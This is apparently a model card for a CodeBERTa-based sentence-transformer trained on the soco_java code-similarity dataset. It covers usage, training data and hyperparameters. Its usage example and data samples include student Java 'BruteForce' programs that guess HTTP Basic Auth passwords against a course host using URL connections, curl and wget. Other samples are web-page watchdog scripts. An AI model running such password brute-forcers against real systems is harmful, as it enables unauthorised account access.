SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: huggingface/CodeBERTa-small-v1
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
- Training Dataset: soco_java
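The similarity function listed above, cosine similarity, can be illustrated with a minimal pure-Python sketch. The helper name `cosine_similarity` and the toy 3-dimensional vectors are assumptions made for illustration; the model itself produces 768-dimensional embeddings and the library computes the score on tensors.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)


# Toy vectors standing in for 768-dimensional embeddings (hypothetical values).
a = [1.0, 2.0, 3.0]
b = [2.0, 4.0, 6.0]   # same direction as a
c = [3.0, 0.0, -1.0]  # orthogonal to a

print(cosine_similarity(a, b))
print(cosine_similarity(a, c))
```

Because the score depends only on direction, scaling an embedding does not change its similarity to other embeddings.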
 
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
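The Pooling module above has only `pooling_mode_mean_tokens` enabled, so the sentence embedding is the average of the token embeddings. A rough pure-Python sketch of that idea follows; `mean_pool` is a hypothetical helper, the 2-dimensional vectors are toy values, and the library performs the equivalent operation on batched tensors.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average token vectors, skipping positions where the mask is 0 (padding)."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    if count == 0:
        raise ValueError("attention mask selects no tokens")
    return [s / count for s in summed]


# Three token vectors; the last one is padding and must not affect the result.
tokens = [[1.0, 2.0], [3.0, 4.0], [100.0, 100.0]]
mask = [1, 1, 0]
sentence_embedding = mean_pool(tokens, mask)
print(sentence_embedding)
```

Masking matters here because inputs shorter than the 512-token limit are padded within a batch, and padding vectors would otherwise skew the average.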
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss-2")
# Run inference
sentences = [
    '\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n        \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n        \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n        \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n        \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n        \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n        \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n        \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n  for(int j=0;j<52;j++)\n  {\n   for(int k=0;k<52;k++)\n   {\n    pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n    String userPassword = ":"+pwd;\n    RealThread myTh = new RealThread(i,userPassword);\n    Thread th = new Thread( myTh );\n    th.start();\n    try\n    {\n     \n     \n     th.sleep(100);\n    }\n    catch(Exception e)\n    {} \n   }\n  }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n  try\n  {\n  String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n  uc = (HttpURLConnection)url.openConnection();\n  uc.setRequestProperty ("Authorization", " " + encoding);\n  System.out.println("Reponse  = "+uc.getResponseCode()+"for pwd = "+userPassword);\n  this.responseCode = uc.getResponseCode();\n  \n  if(uc.getResponseCode()==200)\n  {\n     System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n     System.exit(0);\n  }\n\n  }\n  catch (Exception e) {\n  System.out.println("Could not execute Thread "+num+" ");\n  }\n }\n\n}\n',
    'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n    static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n    static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n    static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n    static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
    '\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t  \tProcess pr= null;\n\t  \tString Fmd5,Smd5,temp1;\n\t  \tint index;\n          \n\t \ttry\n          \t{\n\t\t    \n\t\t    pr = t.exec("md5sum csfirst.html");\n\n                    InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread = new BufferedReader(stre);\n\t\t    \n\t\t    s = bread.readLine();\n\t\t    index = s.indexOf(\' \');\n\t\t    Fmd5 = s.substring(0,index);\n\t\t    System.out.println(Fmd5);\n\t\t    \n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("md5sum index.html");\n\t\t    \n\n\t\t    InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread1 = new BufferedReader(stre1);\n\t\t    \n\t\t    temp1 = bread1.readLine();\n\t\t    index = temp1.indexOf(\' \');\n\t\t    Smd5 = temp1.substring(0,index);\n\t\t    System.out.println(Smd5);\n\t\t\n\t\t    pr = null;\n\t\t\n\t\t    if(Fmd5 == Smd5)\n\t\t       System.out.println("  changes Detected");\n\t\t    else\n\t\t    {\n\t\t       pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t       pr = null;\n\t\t       \n\t\t       try{\n\t\t       Thread.sleep(10000);\n\t\t       }catch(Exception e){}\n\t\t       \n\t\t       pr = t.exec(" Message.txt | mutt -s Chnages  Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t     \n\t\t       \n\t\t       \n\t\t    }   \n\t\t    \n    \t        }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
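A similarity matrix like the one printed above is often turned into a ranked list of candidate pairs, for example when looking for source files that resemble each other. The sketch below assumes a plain nested list (a tensor can be converted with `.tolist()`); `rank_pairs`, the threshold, and the toy scores are hypothetical and not part of the library.

```python
def rank_pairs(similarity_matrix, threshold=0.0):
    """Return (i, j, score) for every pair i < j at or above the threshold, best first."""
    pairs = []
    n = len(similarity_matrix)
    for i in range(n):
        for j in range(i + 1, n):  # upper triangle only: skips self-pairs and mirrored pairs
            score = similarity_matrix[i][j]
            if score >= threshold:
                pairs.append((i, j, score))
    return sorted(pairs, key=lambda pair: pair[2], reverse=True)


# Toy 3x3 matrix with made-up scores, standing in for real model output.
toy_similarities = [
    [1.0, 0.2, 0.9],
    [0.2, 1.0, 0.4],
    [0.9, 0.4, 1.0],
]
ranked = rank_pairs(toy_similarities, threshold=0.3)
print(ranked)
```

With real output, `rank_pairs(similarities.tolist())` would list the three input programs pairwise, most similar first. A suitable threshold is not given in this card and would need to be chosen on held-out data.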
Training Details
Training Dataset
soco_java
- Dataset: soco_java
- Size: 30,069 training samples
- Columns: label, text_1, and text_2
- Approximate statistics based on the first 1000 samples:

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details | 0: ~99.70%, 1: ~0.30% | min: 51 tokens, mean: 450.65 tokens, max: 512 tokens | min: 51 tokens, mean: 468.5 tokens, max: 512 tokens |
- Samples (texts are truncated with "..."):

Sample 1
label: 0
text_1:
    import java.io.*;
    import java.net.*;
    import java.Runtime;
    import java.util.*;
    import java.net.smtp.SmtpClient;
    public class WatchDog
    {
    static String strImageOutputFile01 = "WebPageImages01.txt";
    static String strImageOutputFile02 = "WebPageImages02.txt";
    static String strWebPageOutputFile01 = "WebPageOutput01.txt";
    static String strWebPageOutputFile02 = "WebPageOutput02.txt";
    static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";
    static String strFromEmailDefault = "@.rmit.edu.";
    static String strToEmailDefault = "@.rmit.edu.";
    static String strFromEmail = null;
    static String strToEmail = null;
    public static void main (String args[])
    {
    URL url = null;
    HttpURLConnection urlConnection;
    int intContentLength;
    String strWebPageText = "";
    String strURL = "http://www.cs.rmit.edu./students/";
    String strPrePend = "...
text_2:
    import java.io.*;
    import java.net.*;
    import java.util.*;
    public class Watchdog
    {
    public static void main(String args[])
    {
    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;
    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;
    EmailClient email = new EmailClient(sender, recipient, hostName);
    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();
    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));
    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);
    String line=webpage.readLine();
    while (line != null)
    {
    writefile.write(line,0,line.length());
    wri...

Sample 2
label: 0
text_1:
    import java.util.*;
    import java.io.*;
    import java.*;
    public class Dogs5
    {
    public static void main(String [] args) throws Exception
    {
    executes("rm index.*");
    executes("wget http://www.cs.rmit.edu./students");
    while (true)
    {
    String addr= "wget http://www.cs.rmit.edu./students";
    executes(addr);
    String hash1 = md5sum("index.html");
    String hash2 = md5sum("index.html.1");
    System.out.println(hash1 +""+ hash2);
    BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));
    String line=" " ;
    String line1=" " ;
    String line2=" ";
    String line3=" ";
    String[] cad = new String[10];
    executes("./.sh");
    int i=0;
    while ((line = buf.readLine()) != null)
    {
    line1="http://www.cs.rmit.edu./students/images"+line;
    if (i==1)
    line2="http://www.cs.rmi...
text_2: (not shown)

Sample 3
label: 0
text_1:
    import java.util.*;
    import java.text.*;
    import java.io.*;
    import java.*;
    import java.net.*;
    public class WatchDog
    {
    public static void main(String args[])
    {
    String s = null;
    String webpage = "http://www.cs.rmit.edu./students/";
    String file1 = "file1";
    String file2 = "file2";
    try
    {
    Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);
    BufferedReader stdInput = new BufferedReader(new
    InputStreamReader(p.getInputStream()));
    BufferedReader stdError = new BufferedReader(new
    InputStreamReader(p.getErrorStream()));
    while ((s = stdInput.readLine()) != null) {
    System.out.println(s);
    }
    while ((s = stdError.readLine()) != null) {
    System.out.println(s);
    }
    try
    {
    p.waitFor();
    }
    catch...
text_2:
    import java.io.*;
    import java.net.*;
    import java.util.*;
    import java.String;
    import java.Object;
    import java.awt.*;
    public class WatchDog
    {
    private URL url;
    private URLConnection urlcon;
    private int lastModifiedSince = 0;
    private int lastModified[] = new int[2];
    private int count = 0;
    public static String oldFile;
    public static String newFile;
    private String diffFile;
    private BufferedWriter bw;
    private Process p;
    private Runtime r;
    private String fileName;
    private ArrayList old[]= new ArrayList[500];
    private ArrayList news[] = new ArrayList[500];
    private String info = "";
    private int index = 0;
    public WatchDog(String fileName)
    {
    this.fileName = fileName;
    oldFile = fileName + ".old";
    newFile = fileName + ".new";
    diffFile = "testFile.txt";
    }
    public static void main(String args[])
    {
    WatchDog wd = new WatchDog("TestDog");
    wd.detectChange(WatchDog.oldFile);
    while (true)
    {
    try
    {
    Thread.slee...

- Loss: SoftmaxLoss
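As background on the loss named above: in the Sentence-BERT formulation cited in the Citation section, the two sentence embeddings u and v are combined into the feature vector (u, v, |u - v|), passed through a linear classifier, and trained with cross-entropy against the label. The pure-Python sketch below illustrates that computation under the assumption that this default feature combination was used, which the card does not state. All helper names, the 2-dimensional embeddings, and the zero-initialised weights are hypothetical.

```python
import math


def softmax_loss_features(u, v):
    """Concatenate u, v and the element-wise absolute difference |u - v|."""
    diff = [abs(a - b) for a, b in zip(u, v)]
    return list(u) + list(v) + diff


def linear(features, weights, bias):
    """One logit per class: dot(weights[c], features) + bias[c]."""
    return [sum(w * f for w, f in zip(row, features)) + b
            for row, b in zip(weights, bias)]


def cross_entropy(logits, label):
    """Negative log-probability of the true label under a softmax over the logits."""
    peak = max(logits)  # subtract the max for numerical stability
    exps = [math.exp(x - peak) for x in logits]
    return -math.log(exps[label] / sum(exps))


# Toy 2-dimensional embeddings for a (text_1, text_2) pair with label 0.
u = [0.5, -1.0]
v = [0.5, 1.0]
features = softmax_loss_features(u, v)   # length 3 * 2 = 6
weights = [[0.0] * 6, [0.0] * 6]         # 2 classes, untrained classifier
bias = [0.0, 0.0]
loss = cross_entropy(linear(features, weights, bias), label=0)
print(features, loss)
```

With an untrained (all-zero) classifier both classes are equally likely, so the loss equals ln 2; training lowers it by adjusting both the classifier and the underlying encoder.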
Evaluation Dataset
soco_java
- Dataset: soco_java at c8fab14
- Size: 3,342 evaluation samples
- Columns: label, text_1, and text_2
- Approximate statistics based on the first 1000 samples:

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details | 0: ~99.40%, 1: ~0.60% | min: 51 tokens, mean: 443.11 tokens, max: 512 tokens | min: 51 tokens, mean: 467.05 tokens, max: 512 tokens |
- Samples (texts are truncated with "..."):

Sample 1
label: 0
text_1:
    import java.Runtime;
    import java.io.*;
    public class differenceFile
    {
    StringWriter sw =null;
    PrintWriter pw = null;
    public differenceFile()
    {
    sw = new StringWriter();
    pw = new PrintWriter();
    }
    public String compareFile()
    {
    try
    {
    Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");
    InputStream write = sw.getInputStream();
    BufferedReader bf = new BufferedReader (new InputStreamReader(write));
    String line;
    while((line = bf.readLine())!=null)
    pw.println(line);
    if((sw.toString().trim()).equals(""))
    {
    System.out.println(" difference");
    return null;
    }
    System.out.println(sw.toString().trim());
    }catch(Exception e){}
    return sw.toString().trim();
    }
    }
text_2:
    import java.*;
    import java.io.*;
    import java.util.*;
    public class BruteForce
    {
    public static void main(String[] args)
    {
    Runtime rt = Runtime.getRuntime();
    Process pr= null;
    char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};
    String pass;
    char temp[] = {'a','a'};
    char temp1[] = {'a','a','a'};
    char temp2[] = {'a'};
    String f= new String();
    String resp = new String();
    int count=0;
    String success = new String();
    InputStreamReader instre;
    BufferedReader bufread;
    for(int k=0;k<52;k++)
    {
    temp2[0]=chars[k];
    pass = new String(temp2);
    count++;
    System.out.println("The password tried ...

Sample 2
label: 0
text_1:
    import java.io.*;
    import java.net.*;
    import java.util.*;
    public class Watchdog
    {
    public static void main(String args[])
    {
    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;
    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;
    EmailClient email = new EmailClient(sender, recipient, hostName);
    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();
    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));
    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);
    String line=webpage.readLine();
    while (line != null)
    {
    writefile.write(line,0,line.length());
    wri...
text_2:
    import java.net.*;
    import java.io.*;
    import java.String;
    import java.*;
    import java.util.*;
    public class BruteForce {
    private static final int passwdLength = 3;
    private static String commandLine
    = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
    private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    private int charLen = chars.length();
    private int n = 0;
    private int n3 = charLen*charLen*charLen;
    private String response;
    private String[] password = new String[charLen*charLen*charLen+charLen*charLen+charLen];
    private char[][] data = new char[passwdLength][charLen];
    private char[] pwdChar2 = new char[2];
    private char[] pwdChar = new char[passwdLength];
    private String url;
    private int startTime;
    private int endTime;
    private int totalTime;
    private float averageTime;
    private boolean finish;
    private Process curl;
    private BufferedReader bf, responseLine;
    ...

Sample 3
label: 0
text_1:
    import java.io.*;
    import java.awt.*;
    import java.net.*;
    public class BruteForce
    {
    public static void main (String[] args)
    {
    String pw = new String();
    pw = getPassword ();
    System.out.println("Password is: "+pw);
    }
    public static String getPassword()
    {
    String passWord = new String();
    passWord = "AAA";
    char[] guess = passWord.toCharArray();
    Process pro = null;
    Runtime runtime = Runtime.getRuntime();
    BufferedReader in = null;
    String str=null;
    boolean found = true;
    System.out.println(" attacking.....");
    for (int i=65;i<=122 ;i++ )
    {
    guess[0]=(char)(i);
    for (int j=65;j<=122 ;j++ )
    {
    guess[1]=(char)(j);
    for (int k=65 ;k<=122 ;k++ )
    {
    guess[2]=(char)(k);
    passWord = new String(guess);
    String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";
    try
    {
    pro = runtime.exec(cmd);
    in = new BufferedReader(new InputStreamReader(pro.getErrorSt...
text_2:
    import java.io.*;
    import java.text.*;
    import java.util.*;
    import java.net.*;
    public class BruteForce extends Thread
    {
    private static final String USERNAME = "";
    private static final char [] POSSIBLE_CHAR =
    {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};
    private static int NUMBER_OF_THREAD = 500;
    private static Date startDate = null;
    private static Date endDate = null;
    private String address;
    private String password;
    public BruteForce(String address, String password)
    {
    this.address = address;
    this.password = password;
    }
    public static void main(String[] args) throws IOException
    {
    if (args.length < 1)
    {
    System.err.println("Invalid usage!");
    System.err.println("...

- Loss: SoftmaxLoss
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- learning_rate: 2e-05
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True
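To make the interaction of `learning_rate`, `warmup_ratio`, and the linear scheduler concrete, here is a small worked sketch of the learning rate over one epoch. It assumes a single device and no gradient accumulation, so that one optimizer step consumes 16 samples; under that assumption 30,069 samples give 1880 steps, which agrees with the epoch fractions in the training logs (step 100 at epoch 0.0532). `linear_schedule_lr` is a hypothetical helper written for illustration, not a library function.

```python
import math


def linear_schedule_lr(step, total_steps, warmup_steps, peak_lr):
    """Linear warmup from 0 to peak_lr, then linear decay back to 0."""
    if step < warmup_steps:
        return peak_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return peak_lr * remaining / max(1, total_steps - warmup_steps)


train_samples = 30069   # from the Training Dataset section
batch_size = 16         # per_device_train_batch_size, single device assumed
peak_lr = 2e-05         # learning_rate
warmup_ratio = 0.1

total_steps = math.ceil(train_samples / batch_size)
warmup_steps = math.ceil(total_steps * warmup_ratio)

print(total_steps, warmup_steps)
for step in (0, 94, 188, 1034, 1880):
    print(step, linear_schedule_lr(step, total_steps, warmup_steps, peak_lr))
```

Under these assumptions the rate climbs for the first 188 steps, peaks at 2e-05, and decays to zero by the final step, so the early rows of the training log fall in the warmup phase.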
All Hyperparameters
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 2e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional
Training Logs
| Epoch | Step | Training Loss | Validation Loss | 
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 | 
| 0.1064 | 200 | 0.0143 | 0.0209 | 
| 0.1596 | 300 | 0.0241 | 0.0241 | 
| 0.2128 | 400 | 0.0174 | 0.0213 | 
| 0.2660 | 500 | 0.0228 | 0.0206 | 
| 0.3191 | 600 | 0.0061 | 0.0226 | 
| 0.3723 | 700 | 0.0194 | 0.0208 | 
| 0.4255 | 800 | 0.0193 | 0.0197 | 
| 0.4787 | 900 | 0.0261 | 0.0175 | 
| 0.5319 | 1000 | 0.0189 | 0.0178 | 
| 0.5851 | 1100 | 0.0089 | 0.0188 | 
| 0.6383 | 1200 | 0.0174 | 0.0161 | 
| 0.6915 | 1300 | 0.0171 | 0.0162 | 
| 0.7447 | 1400 | 0.0149 | 0.0155 | 
| 0.7979 | 1500 | 0.011 | 0.0164 | 
| 0.8511 | 1600 | 0.0308 | 0.0160 | 
| 0.9043 | 1700 | 0.0048 | 0.0167 | 
| 0.9574 | 1800 | 0.0142 | 0.0164 | 
| 0.0532 | 100 | 0.0049 | - | 
| 0.1064 | 200 | 0.0117 | - | 
| 0.1596 | 300 | 0.0151 | - | 
| 0.2128 | 400 | 0.0152 | - | 
| 0.2660 | 500 | 0.0138 | - | 
| 0.3191 | 600 | 0.0051 | - | 
| 0.3723 | 700 | 0.0143 | - | 
| 0.4255 | 800 | 0.0155 | - | 
| 0.4787 | 900 | 0.0147 | - | 
| 0.5319 | 1000 | 0.0128 | - | 
| 0.5851 | 1100 | 0.0061 | - | 
| 0.6383 | 1200 | 0.0138 | - | 
| 0.6915 | 1300 | 0.0082 | - | 
| 0.7447 | 1400 | 0.0095 | - | 
| 0.7979 | 1500 | 0.0073 | - | 
| 0.8511 | 1600 | 0.0189 | - | 
| 0.9043 | 1700 | 0.0028 | - | 
| 0.9574 | 1800 | 0.0092 | - | 
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers and SoftmaxLoss
@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}